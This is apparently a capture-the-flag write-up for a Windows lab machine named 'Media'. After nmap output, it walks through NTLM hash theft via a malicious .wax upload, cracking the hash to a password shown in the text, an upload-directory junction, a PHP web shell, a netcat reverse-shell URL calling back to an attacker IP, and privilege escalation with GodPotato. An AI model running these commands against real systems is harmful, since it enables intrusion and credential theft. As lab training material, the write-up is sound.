Media
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 0b:b3:c0:80:40:88:e1:ae:aa:3b:5f:f4:c2:23:c0:0d (RSA)
| 256 e0:80:3f:dd:b1:f8:fc:83:f5:de:d5:b3:2d:5a:4b:39 (ECDSA)
|_ 256 b5:32:c0:72:18:10:0f:24:5d:f8:e1:ce:2a:73:5c:1f (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: ProMotion Studio
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=MEDIA
| Not valid before: 2024-04-02T07:31:21
|_Not valid after: 2024-10-02T07:31:21
| rdp-ntlm-info:
| Target_Name: MEDIA
| NetBIOS_Domain_Name: MEDIA
| NetBIOS_Computer_Name: MEDIA
| DNS_Domain_Name: MEDIA
| DNS_Computer_Name: MEDIA
| Product_Version: 10.0.20348
|_ System_Time: 2024-04-03T07:32:26+00:00
|_ssl-date: 2024-04-03T07:32:32+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Now we discover a file upload and the file is opened in windows media player We can use ntlm_theft to steal NTLM hashes: To generate payload:
python3 ntlm_theft.py --generate wax --server 10.8.1.208 --filename payload
We receive the hashes in responder: Now cracking in hashcat: enox : 1234virus@ Using these creds for ssh we get a shell:
Now we can access the files of the website at
C:\xampp\htdocs>
And analysing the index.php file we can tell where uploaded files go: We can upload a shell.php and symlink junction it to
C:\xampp\htdocs
.
mklink /J C:\Windows\Tasks\Uploads\0c5cb0e2f2633bb6ab6497d9dde23df0 C:\xampp\htdocs
Now uploading shell.php we can access it in root directory and execute whoami Now getting a reverse shell with netcat http://media.vl/shell.php?cmd=c:\temp\nc64.exe+-e+cmd.exe+10.8.1.208+9005
Then using Fullpower and Godpotato we get administrator.
Last updated
Was this helpful?